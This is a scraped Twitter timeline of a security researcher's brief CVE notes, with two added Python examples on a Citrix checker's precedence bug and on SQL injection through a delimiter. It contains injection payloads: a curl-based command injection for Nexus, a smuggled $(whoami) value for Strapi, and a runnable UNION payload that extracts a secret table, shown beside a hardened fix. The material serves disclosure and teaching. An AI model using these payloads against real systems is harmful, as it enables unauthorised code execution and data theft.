Tweets

Henry Chen @chybeta · 11h
Citrix offers a tool to check CVE-2019-19781
support.citrix.com/article/CTX269…
if ("[global]") and ("encrypt passwords") and ("name resolve order") in str(response):
=>
if True and True and ("name resolve order") in str(response):
🤔🤔🤔 pic.twitter.com/JnojIYdYMh
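The two `if` lines above are a Python operator-precedence trap: `in` binds tighter than `and`, so the expression parses as `"[global]" and "encrypt passwords" and ("name resolve order" in body)`, and the two bare string literals are just truthy constants. The block below is an added example, not Citrix's tool or @chybeta's code; the sample response bodies and the function names are constructed for illustration.

```python
# Added example (not Citrix's checker or @chybeta's code): the precedence
# trap behind the quoted `if` line. In Python, `in` binds tighter than `and`,
# so the expression parses as
#   "[global]" and "encrypt passwords" and ("name resolve order" in body)
# and the first two operands are string literals, i.e. always truthy.

MARKERS = ("[global]", "encrypt passwords", "name resolve order")

# Constructed sample bodies (not real Citrix ADC responses).
SMB_CONF_LIKE = (
    "[global]\n"
    "    encrypt passwords = yes\n"
    "    name resolve order = lmhosts wins host bcast\n"
)
ONE_MARKER_ONLY = "<html>name resolve order</html>"
CLEAN = "<html>ok</html>"


def check_as_written(response) -> bool:
    """The check exactly as quoted: only the last marker is actually tested."""
    return bool(("[global]") and ("encrypt passwords") and ("name resolve order") in str(response))


def check_intended(response) -> bool:
    """What the author presumably meant: every marker must occur in the body."""
    body = str(response)
    return all(marker in body for marker in MARKERS)


def compare(response) -> dict:
    """Side-by-side result for one body, so the divergence is visible."""
    return {"as_written": check_as_written(response), "intended": check_intended(response)}


if __name__ == "__main__":
    for name, body in (("smb.conf-like", SMB_CONF_LIKE),
                       ("one marker only", ONE_MARKER_ONLY),
                       ("clean", CLEAN)):
        print(name, compare(body))
```

A body that contains only `name resolve order` (say, a page that merely echoes the probe) passes the check as written but fails the intended one; a body containing none of the markers fails both, which is why the bug is easy to miss when testing only against clean hosts.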

Henry Chen @chybeta · 3 Feb
CVE-2020-7471: SQLI in Django:
django.contrib.postgres.aggregates.StringAgg aggregation function was subject to SQL injection, using a suitably crafted delimiter.
djangoproject.com/weblog/2020/fe…
FIX: github.com/django/django/… pic.twitter.com/NljqLmin93
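The point of the advisory is that a user-controlled *delimiter* is still an injection point when it is spliced into the SQL text rather than bound as a parameter. The block below is an added example, not Django's code and not the linked fix: it uses sqlite3's `group_concat(x, sep)` as an offline stand-in for PostgreSQL's `STRING_AGG(x, sep)`, with a constructed schema, a constructed payload and constructed function names, and shows the interpolated form beside the parameterised one.

```python
import sqlite3

# Added example (not Django's code): why a user-controlled delimiter is an
# injection point when it is interpolated into the statement. sqlite3's
# group_concat(x, sep) stands in for PostgreSQL's STRING_AGG(x, sep) so the
# demo runs offline; the real Django fix lives in the linked commit.


def make_db() -> sqlite3.Connection:
    """Constructed schema: a table to aggregate and a table the caller should never see."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE article (id INTEGER, tag TEXT);
        INSERT INTO article VALUES (1, 'a'), (1, 'b');
        CREATE TABLE secret (token TEXT);
        INSERT INTO secret VALUES ('s3cr3t-token');
        """
    )
    return conn


def string_agg_vulnerable(conn, delimiter: str) -> list:
    """VULNERABLE (illustrative): delimiter spliced into the SQL text, so a quote breaks out."""
    sql = "SELECT group_concat(tag, '%s') FROM article" % delimiter
    return conn.execute(sql).fetchall()


def string_agg_fixed(conn, delimiter: str) -> list:
    """HARDENED: delimiter bound as a parameter; it can only ever be a string value."""
    return conn.execute("SELECT group_concat(tag, ?) FROM article", (delimiter,)).fetchall()


# Constructed delimiter payload: closes the string literal and the function
# call, UNIONs in the secret table, then comments out the rest of the query.
PAYLOAD = "') FROM article UNION SELECT token FROM secret --"


def demo() -> dict:
    """Run the same payload through both forms plus a benign delimiter."""
    conn = make_db()
    return {
        "vulnerable": string_agg_vulnerable(conn, PAYLOAD),
        "fixed": string_agg_fixed(conn, PAYLOAD),
        "benign_fixed": string_agg_fixed(conn, ", "),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

With the payload, the interpolated form returns a second row holding the secret token; the bound form returns a single aggregated string in which the payload is just an odd-looking separator between `a` and `b`.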

Henry Chen @chybeta · 16 Jan
CVE-2020-2551 WebLogic RCE via IIOP protocol. pic.twitter.com/WyKVkQASiL

Henry Chen @chybeta · 16 Jan
;) not enough work to keep me busy

Henry Chen @chybeta · 15 Jan
Authenticated

Henry Chen @chybeta · 15 Jan
CVE-2020-5504 SQLI in phpMyAdmin: A malicious user could inject custom SQL in place of their own username when creating queries to this page
phpmyadmin.net/security/PMASA…
fix: github.com/phpmyadmin/php… pic.twitter.com/S3a3B1zHz4

Henry Chen @chybeta · 10 Jan
Found a "new" way to get JDBC deserialization RCE, and it doesn't need any interceptor. pic.twitter.com/kYEZoE4WGP

Henry Chen @chybeta · 3 Jan
After digging deep into this commit
github.com/phpmyadmin/php…
you will find it's actually an XSS...
More details: xz.aliyun.com/t/6960
Related issue: github.com/phpmyadmin/php… twitter.com/chybeta/status… pic.twitter.com/fIdikBOHbo

Henry Chen @chybeta · 2 Jan
CVE-2019-10758: post-auth Remote Code Execution in mongo-express < 0.54.0 via endpoints that use the `toBSON` method.
However, there are lots of no-auth mongo-express instances...
Shodan: shodan.io/search?query=M…
PoC: github.com/masahiro331/CV… pic.twitter.com/zp7EK2cmu3

Henry Chen @chybeta · 29 Dec
Apereo CAS 4.2.X Remote Code Execution (execution=xxx_ZXlKaGJH...): GIF 👇
And about the Apereo CAS 4.1.X Remote Code Execution (execution=xxx_AAAAIg...):
twitter.com/pyn3rd/status/…
Thanks @pyn3rd pic.twitter.com/7HmCFT5wcT

Henry Chen @chybeta · 10 Dec
Attack unauthenticated scrapyd by deploying an evil egg.
Author: @phithon_xg
leavesongs.com/PENETRATION/at…
github.com/vulhub/vulhub/… pic.twitter.com/uOewwNEJ5w

Henry Chen @chybeta · 9 Dec
CVE-2019-15588: OS Command Injection in Nexus Repository Manager 2.x (bypass of the CVE-2019-5475 fix)
"createrepo" / "mergerepo" => /bin/bash -c curl${IFS}http://192.168.88.1:8000/ || /createrepo
CVE-2019-15588 hackerone.com/reports/688270
CVE-2019-5475 hackerone.com/reports/654888 twitter.com/700_isnuoT/sta… pic.twitter.com/obBu2yRv44

Henry Chen @chybeta · 9 Dec
👀?

Henry Chen @chybeta · 8 Dec
👍

Henry Chen @chybeta · 6 Dec
CVE-2019-19609 Strapi Framework Post-Auth RCE
curl -H $'Authorization: Bearer [jwt]' ... --data {"plugin": "documentation && $(whoami > /tmp/whoami)","port":"1337"}
bittherapy.net/post/strapi-fr… pic.twitter.com/Xy0RL8l3kS

Henry Chen @chybeta · 5 Dec
Yes, I want it.

Henry Chen @chybeta · 4 Dec
CVE-2019-3990 User Enumeration Vulnerability
GET /api/users/search?email=@test.com
=> {"code":400,"message":"username is required"}
GET /api/users/search?username=t
=> User Enumeration
github.com/goharbor/harbo… twitter.com/chybeta/status… pic.twitter.com/aLRMzmppGt

Henry Chen @chybeta · 4 Dec
Harbor Security Update:
1. Privilege Escalation
2. CVE-2019-19029 SQL Injection via user-groups
3. CVE-2019-19026 SQL Injection via project quotas
4. CVE-2019-19025 Missing CSRF protection
5. CVE-2019-3990 User Enumeration Vulnerability
github.com/goharbor/harbo… pic.twitter.com/jPZcUK9wvv

Henry Chen @chybeta · 4 Dec
CVE-2019-5096 GoAhead web server code execution vulnerability: An exploitable code execution vulnerability exists in the processing of multi-part/form-data requests within the base GoAhead web server application in versions v5.0.1, v4.1.1 and v3.6.5.
talosintelligence.com/vulnerability_…

Henry Chen @chybeta · 2 Dec
CVE-2019-19118: Privilege escalation in the Django admin.
djangoproject.com/weblog/2019/de… pic.twitter.com/wcqweZHCoW